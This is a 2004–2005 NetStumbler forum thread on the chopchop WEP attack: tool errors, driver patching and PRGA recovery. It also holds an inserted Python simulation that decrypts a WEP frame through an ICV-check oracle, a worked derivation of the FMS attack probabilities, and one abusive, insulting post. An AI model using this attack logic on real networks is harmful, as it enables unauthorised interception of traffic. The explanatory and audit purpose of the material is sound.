NetStumbler.org Forums

12-10-2004, #31
prompt
Registered Member
 
Join Date: Nov 2004
Posts: 2
chopchop error

Hi,
Just wondering if anyone came across this error and whether they know the reason for it. I have already done everything in the chopchop readme, including patching. I have replaced the MAC addresses below.

./chopchop -b macaddress -m macaddress -p /home/siouxchief/Kismet-Dec-09-2004-5.dump -burst 13

macaddress 6
0
macaddress 6
Cannot open the wlan device wlan0

cheers
prompt

12-10-2004, #32
RedSector
CoWF Priest
 
Join Date: Nov 2004
Location: Illinois
Posts: 673
You probably shouldn't double post. (http://netstumbler.org/showpost.php?...6&postcount=31) A mod will come layeth the smack down.

12-10-2004, #33
Thorn
Did you do the math?
 
Join Date: Apr 2002
Location: Villa Straylight
Posts: 9,965
Smackdown

prompt,
Please do not crosspost. If you haven't already done so, please read the rules. Doing so will prevent a lot of grief.
__________________
Thorn
"You guys'll be chalk outlines without me."

12-10-2004, #34
KoreK
Banned in DC
 
Join Date: Jul 2004
Posts: 102
Stupid noobs can't even properly read the thread before posting. Never mind acknowledging the PMs I sent them (that applies to sknikam as well). Anyway, prompt is a fucktard (apart from the double-post reason, not reading my post, not reading my PM) because
1) He wasn't root.
2) He didn't properly configure the PCMCIA, so wlan-ng isn't properly loaded.
3) (And in the remote case this is some bug) The little shit doesn't even have the intelligence to post his configuration/kernel version.

12-10-2004, #35
prompt
Registered Member
 
Join Date: Nov 2004
Posts: 2
?

First of all, I posted a new thread thinking it would be a thread on its own and never thought that it would be placed in

"chopchop (Experimental WEP attacks) thread"

so when I went to check for replies and saw that the post wasn't in the main posting list, I thought that I might have forgotten to post it, because I have been under a lot of pressure due to the death of a close relative yesterday, so I reposted, which also got placed into this thread

"chopchop (Experimental WEP attacks)"

so it was an honest mistake, and I admit a silly mistake. Sorry if this upset anyone. I didn't think people were that serious about mistakes. I thank Thorn and RedSector for being somewhat understanding. Maybe ye could help me with that error?
Apart from that, I applied the patch and installed everything as root and ran it as root. Just because I didn't read you were Pre-Menstrual (PM), Korek, is no excuse to get annoyed.


regards
prompt

Last edited by prompt : 12-10-2004 at 10:01 AM.

12-10-2004, #36
Thorn
Did you do the math?
 
Join Date: Apr 2002
Location: Villa Straylight
Posts: 9,965
Quote:
Originally Posted by prompt
First of all, I posted a new thread thinking it would be a thread on its own and never thought that it would be placed in

"chopchop (Experimental WEP attacks) thread"

so when I went to check for replies and saw that the post wasn't in the main posting list, I thought that I might have forgotten to post it, because I have been under a lot of pressure due to the death of a close relative yesterday, so I reposted, which also got placed into this thread

"chopchop (Experimental WEP attacks)"

so it was an honest mistake, and I admit a silly mistake. Sorry if this upset anyone. I didn't think people were that serious about mistakes. I thank Thorn and RedSector for being somewhat understanding. Maybe ye could help me with that error?
Apart from that, I applied the patch and installed everything as root and ran it as root. Just because I didn't read you were Pre-Menstrual (PM), Korek, is no excuse to get annoyed.


regards
prompt
It's unfortunate about the death in the family. You have my sympathies.

In the future, if a post doesn't appear where you expect it to be, search under your name. You can get a current list of all your posts anytime. If you've posted in error, you may delete your own posts.

Also before posting a new thread, search to see if the subject is covered. If a prior thread is on the same subject, we reserve the right to merge the threads. (It says so right at the bottom of each page.)

If a thread is over one year old, then it will probably be safe to start a new thread.
__________________
Thorn
"You guys'll be chalk outlines without me."

12-15-2004, #37
joconnor
Registered Member
 
Join Date: Dec 2004
Posts: 4
Hi,

I've been reading with interest throughout this thread about chopchop, so I installed everything required to use it. I just have a few queries.

First, I was wondering what packets I should be filtering for with Ethereal that would be able to be decoded with chopchop and produce a PRGA?

Secondly, I have a 100 MB file which I filtered for ARP requests with Ethereal, but it doesn't find a single one! Is this a common thing on wireless networks, and can you force ARP requests with the aj0 driver to force disassociations, which might produce at least one ARP request maybe?

Those are just a few thoughts to see if ye can shed light on them. Be gentle, I'm just trying to get my head around these injection ideas.

regards
joconnor

12-16-2004, #38
KoreK
Banned in DC
 
Join Date: Jul 2004
Posts: 102
Quote:
Originally Posted by joconnor
First, I was wondering what packets I should be filtering for with Ethereal that would be able to be decoded with chopchop and produce a PRGA?
Any IP/ARP packet should work. You will have problems with NetBIOS/Netware/AppleTalk packets. In that case the first five to eight bytes will remain encrypted, IIRC. You get a PRGA file for each IV, though the format is specific to chopchop. Look up the source. And you get the decrypted pcap file.

Quote:
Secondly, I have a 100 MB file which I filtered for ARP requests with Ethereal, but it doesn't find a single one! Is this a common thing on wireless networks, and can you force ARP requests with the aj0 driver to force disassociations, which might produce at least one ARP request maybe?
I mentioned ARP packets at the beginning of the thread, but it doesn't matter. It's just that they are very fast to decrypt, since they are short and full of 0's (0 being the first guess made by chopchop). Just take a short encrypted packet and try it. If you want to see ARP packets in your pcap file, you need to enter your WEP key in Ethereal preferences/protocols/ieee80211. They are encrypted, and unless you are using static ARP tables, there should be quite a few.

ARP packets are used by devine's aireplay to generate traffic (which can be used to recover a key with aircrack). chopchop doesn't care much about the traffic it generates; the goal is to decrypt a given packet (without the key).
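The decrypt-a-packet-without-the-key step KoreK describes above, as an added example (this is not KoreK's chopchop source and not code from this thread): a self-contained Python simulation of the chopchop attack on WEP. The WEP key, IV and frame contents are constructed for the demo, and the only thing the attacking side is given is an accept/reject oracle standing in for the AP's ICV check. Each round chops the last byte off the frame, guesses the plaintext value of that byte, patches the last four remaining bytes with a mask derived from the CRC-32 table so that the shortened frame carries a valid ICV if the guess is right, and learns one keystream byte from the accepted guess. The recovered keystream is the per-IV PRGA the post mentions; XORed with the captured frame it yields the plaintext.

```python
import zlib

# --- Minimal WEP (RC4 + little-endian CRC-32 ICV). Only the simulated AP uses the key. ---

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes (KSA then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(msg: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, least significant byte first."""
    return zlib.crc32(msg).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, msg: bytes) -> bytes:
    return xor(msg + icv(msg), rc4(iv + key, len(msg) + 4))


def wep_icv_ok(key: bytes, iv: bytes, frame: bytes) -> bool:
    """The AP's side: decrypt and check the ICV. This accept/reject is the whole oracle."""
    if len(frame) < 4:
        return False
    pt = xor(frame, rc4(iv + key, len(frame)))
    return pt[-4:] == icv(pt[:-4])


# --- Attacker's side: has the ciphertext and the oracle, never the key. ---

def _crc_table() -> list:
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table

CRC_TABLE = _crc_table()
# The 256 table entries have 256 distinct high bytes; chopchop depends on that.
HIGH_BYTE_TO_INDEX = {t >> 24: i for i, t in enumerate(CRC_TABLE)}


def correction(guess: int) -> bytes:
    """XOR mask for the last four bytes of a frame whose final byte was chopped off,
    assuming `guess` is the plaintext value of the chopped byte. From CRC-32's byte
    step reg' = table[(reg ^ b) & 0xFF] ^ (reg >> 8) plus the final complement, the
    mask is (idx ^ 0xFF, low three bytes of table[idx]) where table[idx] is the entry
    whose high byte is guess ^ 0xFF. It depends only on the guess, not on the plaintext."""
    idx = HIGH_BYTE_TO_INDEX[guess ^ 0xFF]
    t = CRC_TABLE[idx]
    return bytes([idx ^ 0xFF, t & 0xFF, (t >> 8) & 0xFF, (t >> 16) & 0xFF])


def chopchop(iv: bytes, frame: bytes, oracle) -> tuple:
    """Recover the whole keystream behind `frame`; returns (keystream, oracle_queries)."""
    keystream = bytearray(len(frame))
    cur, queries = frame, 0
    while len(cur) > 4:
        for guess in range(256):
            cand = cur[:-1]
            cand = cand[:-4] + xor(cand[-4:], correction(guess))
            queries += 1
            if oracle(iv, cand):                  # accepted: the guess was right
                keystream[len(cur) - 1] = cur[-1] ^ guess   # keystream byte falls out
                cur = cand                        # shorter frame, still valid
                break
        else:
            raise RuntimeError("no guess accepted; the oracle is not a WEP ICV check")
    # Four bytes remain: the ICV of the empty message, and crc32(b"") == 0.
    keystream[:4] = xor(cur, icv(b""))
    return bytes(keystream), queries


def demo(msg: bytes) -> tuple:
    """Encrypt `msg` under a key the attacker never reads, then recover it via the
    AP oracle. Returns (recovered_plaintext, oracle_queries)."""
    key = bytes.fromhex("0badc0ffee")             # constructed 40-bit WEP key
    iv = bytes.fromhex("010203")                  # constructed 24-bit IV
    frame = wep_encrypt(key, iv, msg)
    ks, queries = chopchop(iv, frame, lambda iv_, f: wep_icv_ok(key, iv_, f))
    return xor(frame, ks)[:-4], queries


# Constructed ARP-like payload: LLC/SNAP header, ethertype 0x0806, then mostly zeros.
ARP_LIKE = bytes.fromhex("aaaa030000000806") + bytes([0, 1, 8, 0, 6, 4, 0, 1]) + bytes(20)

if __name__ == "__main__":
    plaintext, n = demo(ARP_LIKE)
    print(plaintext.hex(), n)
```

demo(ARP_LIKE) returns the original bytes together with the number of oracle queries spent; exactly one of the 256 guesses per round is accepted, so each recovered byte costs at most 256 queries. A real AP additionally enforces a minimum frame length and only relays frames it can make sense of, so a real run cannot chop all the way down to the bare ICV the way this simulation does and has to get the first few bytes some other way (the known LLC/SNAP header, for instance).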
02-15-2005, #39
mfenetre
Registered Member
 
Join Date: Feb 2005
Posts: 2
Chopchop problem

Hi all,

I was just wondering if someone ever met this problem with Chopchop.

when I launch chopchop, this happens :

[root@localhost chopchop]./chopchop -i eth1 -m 00:60:1D:1F:11:ED -b 00:40:96:33:33:33 -p capture.cap
00:60:1D:1F:11:ED 6
00:40:96:33:33:33 6
0
first pass
---------------
packet number 001
base src mac: 00 60 1d 1f 11 ed
base dst mac: ff 2a f7 d1 d8 ec

Then nothing happens for a long time. Furthermore, I'm scanning the network with another laptop and I sniff no packets from the laptop running chopchop...

I use Red Hat 8.0 with a 2.4.18-14 kernel. I have a Lucent Orinoco Silver PCMCIA card, and I use the orinoco_cs driver (0.13e patched). I've followed the 4 steps described in Korek's readme...

I'm quite sure my wireless card is working fine; I'm able to sniff some traffic in monitor mode (using airodump & aircrack, for example).

Any ideas ?

Thanks in advance,
mfenetre

Last edited by mfenetre : 02-15-2005 at 04:53 PM.

02-16-2005, #40
sylvain
Wireless Auditor
 
Join Date: Jun 2004
Location: Paris, France
Posts: 175
Quote:
Originally Posted by mfenetre
Hi all,

I was just wondering if someone ever met this problem with Chopchop.

when I launch chopchop, this happens :

[root@localhost chopchop]./chopchop -i eth1 -m 00:60:1D:1F:11:ED -b 00:40:96:33:33:33 -p capture.cap
00:60:1D:1F:11:ED 6
00:40:96:33:33:33 6
0
first pass
---------------
packet number 001
base src mac: 00 60 1d 1f 11 ed
base dst mac: ff 2a f7 d1 d8 ec

Then nothing happens for a long time. Furthermore, I'm scanning the network with another laptop and I sniff no packets from the laptop running chopchop...

I use Red Hat 8.0 with a 2.4.18-14 kernel. I have a Lucent Orinoco Silver PCMCIA card, and I use the orinoco_cs driver (0.13e patched). I've followed the 4 steps described in Korek's readme...

I'm quite sure my wireless card is working fine; I'm able to sniff some traffic in monitor mode (using airodump & aircrack, for example).

Any ideas ?

Thanks in advance,
mfenetre
If I remember well, you should patch your driver with a patch done by Korek for reinjecting packets.
Otherwise, chopchop works better with a Prism2 card.

02-16-2005, #41
mfenetre
Registered Member
 
Join Date: Feb 2005
Posts: 2
Hi sylvain,

thanks for your answer.
In fact, the patch delivered with chopchop is for linux-wlan-ng, and I don't use it (only the orinoco_cs driver). Maybe I'll test with linux-wlan-ng patched with the chopchop patch.

Did anyone succeed in using orinoco drivers with chopchop?

thx,
mfenetre.

02-16-2005, #42
sylvain
Wireless Auditor
 
Join Date: Jun 2004
Location: Paris, France
Posts: 175
Quote:
Originally Posted by mfenetre
Hi sylvain,

thanks for your answer.
In fact, the patch delivered with chopchop is for linux-wlan-ng, and I don't use it (only the orinoco_cs driver). Maybe I'll test with linux-wlan-ng patched with the chopchop patch.

Did anyone succeed in using orinoco drivers with chopchop?

thx,
mfenetre.
OK, so you have to use wlan-ng patched drivers. Otherwise it won't work (that's the case for orinoco). It can work with hostap also, I think.

02-16-2005, #43
KoreK
Banned in DC
 
Join Date: Jul 2004
Posts: 102
Quote:
Originally Posted by sylvain
OK, so you have to use wlan-ng patched drivers. Otherwise it won't work (that's the case for orinoco). It can work with hostap also, I think.
He has to use the wlan-ng patch. I didn't manage to make hostap work.

mfenetre, just a reminder: you need an AP, an associated card, and an injection card using the wlan-ng patched module (or just associate the wlan-ng card, yank it out, put it back in, inject, and hope it hasn't been disassociated). If you don't know where to begin, have a look at the Auditor CD; chopchop is included:
http://new.remote-exploit.org/index.php/Auditor_main

03-05-2005, #44
Madory
Registered Member
 
Join Date: Jan 2005
Posts: 3
Mathematical origin of 5% and 13% in WEP attacks

Not sure if this question fits in this forum but I'm sure to be corrected if I'm wrong, so here goes...

What is the origin of the 5% and the 13% probabilities in the WEP attacks? I have read the FMS and H1kari papers and understood them (I think). Now, I know that:

Prob of success = e^(-3) = 5% (when all X, Y and Z are not swapped)
and
Prob of success = e^(-2) = 13% (when two of X, Y and Z are not swapped)

I already know that they come from modeling the remaining KSA swaps as random, but how are these stats derived?

On Pg. 9 of the FMS paper there is a reference to the following formula:
e^(-2B/N)
where B is the # of the byte of the SK being attacked and N is the length of the keystream. But this formula doesn't seem to apply to my question because there aren't any logical values of B and N that make (2B/N) equal to 2 or 3.

Is there a general form of some crypto-analytical formula that applies here?

Thanks for the help!

03-06-2005, #45
Madory
Registered Member
 
Join Date: Jan 2005
Posts: 3
Answer to my own question: origin of 5%

When I now see the answer, I want to kick myself for not figuring it out sooner...

For the FMS attack to work, the first two bytes of the IV and the target byte of the secret key must survive the KSA swapping algorithm unchanged after the expected swaps occur. If we model the remaining swaps as random, then the chance that the three bytes in question are unchanged is 5%. This number comes from aggregating the probability that a byte is unchanged over each step over the three bytes.

P(1 byte is unchanged after one random swap) = (1 – 1/N)
N is the length of the resulting keystream.
P(1 byte is unchanged after N random swaps) = (1 – 1/N)^N
P(3 bytes are unchanged after N random swaps) = ((1 – 1/N)^N)^3

The expression, ((1 – 1/N)^N)^3, can be modeled as e^-3 because as N grows to be of any applicable length, the value of the expression asymptotically heads for 0.05. In the end, the value of N is irrelevant as the value is always just below 5%.

If we were to try to keep two bytes the same, P = ((1 – 1/N)^N)^2, or e^-2, or 13%.

Thanks anyway.
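Added here as a worked check, not part of Madory's post: the limit behind the e^-3 and e^-2 figures, and the finite values for N = 256 (taking N as the size of the RC4 permutation is an assumption of this note, not something the post fixes):

$$\lim_{N\to\infty}\left(1-\frac{1}{N}\right)^{N} = e^{-1}, \qquad \text{hence} \qquad \left(\left(1-\frac{1}{N}\right)^{N}\right)^{k} \longrightarrow e^{-k}.$$

For $N = 256$ the finite values are already within a few tenths of a percent of the limits:

$$\left(\tfrac{255}{256}\right)^{256} \approx 0.3672, \qquad \left(\tfrac{255}{256}\right)^{3\cdot 256} \approx 0.0495 \approx e^{-3} = 0.0498, \qquad \left(\tfrac{255}{256}\right)^{2\cdot 256} \approx 0.1348 \approx e^{-2} = 0.1353.$$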